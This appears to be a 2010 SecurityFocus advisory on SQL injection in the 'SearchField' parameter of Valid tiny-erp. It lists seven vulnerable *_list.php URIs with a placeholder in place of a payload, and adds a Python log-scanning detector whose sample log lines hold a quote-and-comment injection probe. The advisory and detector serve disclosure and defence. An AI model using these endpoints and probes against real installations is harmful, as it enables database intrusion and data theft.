Valid tiny-erp 'SearchField' Parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/validerp/_partner_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/proioncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/_rantevou_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/syncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/synallasomenos_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/ypelaton_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
http://www.example.com/validerp/yproion_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL injection]
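A defender can look for this pattern in web server access logs. The following is an added example, not part of the original advisory: it flags requests to the `*_list.php` pages whose `SearchField` value is anything other than a bare column name. The identifier rule, the treatment of an empty value, and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate SearchField value is a bare column name.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# The affected scripts listed in the advisory all end in _list.php.
LIST_PAGE = re.compile(r"_list\.php$")
# Request line as it appears in common/combined access log format.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /validerp/_partner_list.php'
    '?a=search&value=1&SearchFor=acme&SearchOption=Contains&SearchField=name HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /validerp/yproion_list.php'
    '?a=search&value=1&SearchFor=x&SearchOption=Contains&SearchField=name%27-- HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /validerp/index.php'
    '?SearchField=a%27 HTTP/1.1" 200 100',
]


def suspicious_searchfield(uri):
    """Return the decoded SearchField values in `uri` that are not plain identifiers."""
    parts = urlsplit(uri)
    if not LIST_PAGE.search(parts.path):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs percent-decodes values, so encoded quotes and spaces are seen as-is.
    # An empty value is not flagged (assumption: it carries no injected text).
    return [v for v in params.get("SearchField", []) if v and not IDENTIFIER.fullmatch(v)]


def scan(log_lines):
    """Return (line_number, path, offending_values) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        bad = suspicious_searchfield(match.group(1))
        if bad:
            hits.append((number, urlsplit(match.group(1)).path, bad))
    return hits


if __name__ == "__main__":
    for number, path, values in scan(SAMPLE_LOG):
        print(f"line {number}: {path} SearchField={values!r}")
```

The same identifier check, applied server-side as an allowlist of known column names before the value reaches a query, is the corresponding input-validation control.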


 

Copyright 2010, SecurityFocus